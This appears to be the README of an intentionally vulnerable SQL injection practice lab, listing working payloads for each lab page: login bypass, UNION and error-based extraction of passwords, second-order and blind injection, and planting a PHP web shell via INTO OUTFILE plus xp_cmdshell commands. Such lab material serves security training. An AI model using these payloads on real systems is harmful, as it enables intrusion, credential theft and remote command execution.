# This document explains the different attacks that can be done on this setup

```
register.php (to create users)
login bypass login1.php
login bypass with ) login2.php
using verbose errors to enumerate column names
    -- login1.php (' having 1=1 -- )(' group by tablename having 1=1 -- ) MSSQL
    -- login1.php (' or 1 in (select @@version) -- ) MySQL
    -- login1.php (' or 1 in (select password from users where username = 'admin') -- )

extracting data 
    -- searchproducts.php (' order by 2 -- )
    -- searchproducts.php (' union select null, null, @@version -- )
    -- searchproducts.php (' union select null, column_name, null, table_name from information_schema.columns -- )
    -- searchproducts.php (' union select null, usernames, null, passwords from usertable -- )
    
second order SQL injection
    -- secondorder_register.php (' or 1 in (select @@version) -- // ) > logs in
    -- secondorder_register.php (' or 1 in (select password from users where username='admin') -- //) > logs in
    -- secondorder_register.php (' or 1 in (select convert(password,unsigned) from users where username='admin') -- ;) > logs in
    -- secondorder_changepass.php


Blind SQL injection
    -- blindsqli.php (blindsqli.php?user=1' and 1=1 -- ) (blindsqli.php?user=admin' and substring((select table_name from information_schema.columns where column_name = 'password' LIMIT 1),1,1)>'a' -- // ) (true false based content change) 
    -- blindsqli.php (blindsqli.php?user=1' waitfor delay '00:00:10'-- MSSQL) (blindsqli.php?user=1' union select if (substring(username,1,1) > 'd', benchmark(100000000, encode('txt','secret')),null) from users where id=1 -- // )
    

OS interaction
    -- os_sqli.php (os_sqli.php?user=qqqq' union select null, null, null, '<pre><?php system($_GET[\'cmd\']); ?></pre>', null into outfile 'C:\xampp\htdocs\sqlhumla\shell.php' -- MySQL
    -- os_sqli.php (os_sqli.php?user=qqqq'; exec master..xp_cmdshell 'ipconfig' -- // 
```